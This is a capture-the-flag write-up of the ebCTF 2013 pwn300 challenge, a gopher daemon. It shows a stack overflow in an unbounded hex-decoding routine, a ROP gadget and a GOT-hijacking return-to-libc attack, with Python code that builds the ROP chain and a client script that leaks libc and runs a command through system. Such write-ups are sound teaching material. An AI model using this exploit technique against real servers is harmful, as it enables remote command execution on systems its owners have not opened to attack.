ebCTF 2013 pwn300 write-up

Sadly, I only have time right now to do this write-up, thus the service is no longer online.

Basically, the service is simple gopher daemon. When we first opened netcat to the daemon, we did not get a reply. Looking at the code shows us why:

Screen Shot 2013-08-11 at 21.00.17

Note that we already renamed the variables to match their semantics. It first checks to see if the string is longer than 1 char. It then checks to see that buffer[length-2] == 0xd and buffer[length-1] = 0xa – translating to a check for \r\n. If this is the case, it moves null bytes into these positions and continues. Thus, let’s send just a \r\n. Doing this leads to a reply 🙂

The daemon welcomes us with some information on the CTF and afterwards a list with all available files. Alongside these is the entry

0FLAG	0f4d0db3668dd58cabb9eb409657eaa8	gopher.eindbazen.net	7070

Without looking at the binary any further, let’s send 0f4d0db3668dd58cabb9eb409657eaa8 – sadly (but nevertheless of course), it returns ACCESS DENIED. Later analysis in the binary shows us that upon loading all files, the content of FLAG is actually replaced with the aforementioned ACCESS DENIED. Thus, let’s continue. The first though that comes to mind (especially since this is a pwn challenge) is a buffer overflow. So, we turn to the function beginning where data is read from the client.

Screen Shot 2013-08-11 at 22.09.39

Sadly, we note that the buffer used is 0x11F away from the ebp and we only read 0xff bytes 🙁 So, this obviously cannot be abused. However, at 0x08049593 we find a call to a function ascii_to_bin which is given two parameters – are reference to variables read_buffer and transformed_hash (both renamed for better readability). So, let’s look at what the code does…

Screen Shot 2013-08-11 at 21.05.08

In terms of abstraction, we note that the loop iterates from offset_in_string = 0 until offset_in_string = strlen(s) and is incremented twice in the loop body. The function n_to_i transforms the hexlified input character into its byte abstraction – basically the string “aa” is transformed into one byte, namely \xaa. This method appearantly has no bounds-checking. So, let’s abuse this! Looking back at the original function, we see that the address in which this function writes is located only 0x20 away from the EBP. Thus, in order to completely fill up all the 0x20 bytes up to the EBP, we need 0x40 bytes of string data (remember, it is unhexlified). Next, we can overwrite the SFP and the return address. To jump to our own address, we just need to write it in its hexlified form.

The first test in gdb worked fine in jumping somewhere. However, when we tried to actually exploit the vuln, we got a SIGSEGV. Backtracing that we found that the call to ascii_to_bin was followed by a call to hashlist_find.

Screen Shot 2013-08-11 at 21.00.25

Quite apparent in this the parameter provided: arg_4. As argument are located on ebp+8 upwards (arg_4 is then located at ebp+8+4 = ebp+0xC), we must be careful not to break things here. Thus, we ran the daemon on our own server, looked into it with GDB and figured the proper address for it to put into our ROP chain.

Summarizing, our ROP payload needs to fulfill the following requirements:

  • It must fill up 0x20 bytes of buffer before we reach the SFP (located at the current EBP)
  • We are free to do what we want with EBP+4 (return EIP) and EBP+8 (first argument to the function)
  • We must make sure that EBP+0xC still points to a readable location

Since we must have the proper address at EBP+0xc, we must have some ROP gadget which “clears” this away. Looking at the binary with ROPgadget, we quickly find one at

0x0804a7dd: pop esi ; pop edi ; pop ebp ; ret

This removes the next three items from the stack into registers we do not really care about. Thus, we overwrite the RIP with said address, put some random stuff into EBP+0x8 and EBP+0x10 and put the proper address into EBP+0xC. This way, hashlist_find still works and we can nevertheless continue with our ROP chain.

The goal for us was – although this might be overkill here – to utilize GOT hijacking to solve this challenge. In this case, the binary only forked. In forking, memory is used copy-on-write — meaning that until memory is chained, the child and the parent share the same memory. Obviously, this could not work if the address space was to be randomized when forking. Thus, leaking a libc address once is sufficient. Nevertheless, I like the attack so I’m going to present it here.

Often within return-to-libc attacks, the binary does not use  the function wanted by the attacker (such as system). However, knowing what libc is used, an attacker can still leverage the fact that the whole library is mapped to memory. We assume that we know the address of the function write somehow and we also know which libc version is used. We can then analyze the library and determined the offset of write and – for our attack – system. We now calculate the difference between these two addresses. Since we know where the function write is mapped in memory, we can easily deduce where system is. Thus, we can just call it directly. As programs are supposed to work with multiple versions of libraries, the addresses cannot be hardcoded in the binary. Therefore, an ELF file has a so-called Global Offset Table. The GOT is basically a jump table for library calls and is filled during runtime upon first calling a library function. As subsequent calls to the same function can then be made directly without the need for resolving.

The concept of GOT hijacking aims at just this fact. Firstly, the GOT offers us a nice way to retrieve the memory address of a libc function. If full RELRO is not active, the GOT is also writable. The basic idea behind GOT hijacking is to first read an address from the GOT and leak it to the attacker. The attacker may then calculate the address of the function he actually wants to call. The exploit code then waits for a new address being sent back from the attacker. This address is then written to the same location we leaked the address from earlier. This effectively overwrites the pointer to the function (say write) with a pointer to system. All we need to do now is jump to the Process Linking Table’s entry for write.

I wrote a python library for this task and will only go into detail on the exploit generation here.

payload = []
FUNC_PLT, FUNC = self.findTarget(func_overwrite)
# this is most likely send
SEND_PLT, SEND = self.findTarget(func_send)
READ_PLT, READ = self.findTarget(func_read)
for i in range(buffersize):
payload.append(struct.unpack("<I","{0}{0}{0}{0}".format(chr((i + 97) % 256)))[0])
# now, clean the stack just in case we need to access some args in the program itself
payload.append(clean_three)
payload.append(struct.unpack("<I", "CRAP")[0])
payload.append(struct.unpack("<I", "CRAP")[0])
payload.append(struct.unpack("<I", "CRAP")[0])
# now, retrieve the address to overwrite using the func_send function
payload.append(SEND)
payload.append(clean_three)
payload.append(fd_out)
payload.append(FUNC_PLT)
payload.append(4) # 32bit, thus 4 bytes to be send
# now, on the client, we may receive the address and do stuff with it 🙂

payload.append(READ)
payload.append(clean_three)
payload.append(fd_in)
payload.append(FUNC_PLT)
payload.append(4) # 32bit, thus 4 bytes to be read

# now we need to store our command somewhere, either give a location or use the BSS

payload.append(READ)
payload.append(clean_three)
payload.append(fd_in)
payload.append(location) # this is for our command line buffer
payload.append(length_cmd)
# now our string for system is here

payload.append(FUNC)
payload.append(0x01020304)
payload.append(location)

for p in range(len(payload)):
  payload[p] = self.translater(payload[p])

return payload

To fully understand the code, let’s recap how library functions in assembly (at least in x86) work. A library call is always made using the so-called cdecl calling convention. This means that parameters are pushed to the stack right to left. Since the stack grows downwards, this means that the first argument has the lowest address on the stack and the last one has the highest. Inside a function, variables may be allocated. Both variables and parameters are usually referenced using the base pointer (EBP). Normally, when calling a function, the return address is also pushed to the stack – thus ending up below the first argument in memory. Thus, when entering the function, the stack looks something like this

0xFF arg3
0xFB arg2
0xF7 arg1
0xF3 ret

Thus, a function always assumes that it must skip some bytes to reach its parameters. With ROP, we don’t really do calls. This means, if we want to have a function with parameters called, we need to make sure the parameters are in the form described above. This is illustrated in line 14 of the code listing. We put the address to our desired function SEND to the stack. When this function returns, the RET will actually pop the next element on the stack into the EIP register. In lines 16 to 18 we pass our parameters to the function. Let’s assume for a minute that the instruction at the address we put to the stack in line 17 was just a NOP. In the next step, the CPU would pop the next value into the EIP register. This obviously is not an address of an instruction we want to call but a parameter to SEND. Thus, here, we use a gadget which pops away the next three values. This means that the values put to the stack in lines 16 to 18 can be used as parameters, but the program will not try to jump to them when going through the ROP chain.

The call in line 41 just encodes our payload in the way we want it – in this case we to hexlify it. From hereon in, it’s simple. We have another script

t = telnetlib.Telnet(args.ip, args.port)
s = t.get_socket()
s.send("%s\r\n" % payload)
leaked_got = struct.unpack("<I", s.recv(4))[0]
libc_base = leaked_got - g.findExport(func_overwrite)
system = libc_base + g.findExport("system")
s.send(struct.pack("<I", system))
s.send(cmd+"\n")
t.interact()

This script now reads the leaked entry from the GOT, calculates the right address for system and sends it back. Afterwards, we send the command we want system to execute (lines 29 following in the code shown above). Please note, that the call to t.interact() does not work here, since STDOUT and STDIN are not redirected to our socket. Now, we just run our exploit and have it send us the flag via netcat 🙂

As mentioned earlier, we need knowledge of the used libc. Since we had already solved pwn200, we just used that library 🙂

Leave a Reply

Your email address will not be published. Required fields are marked *

*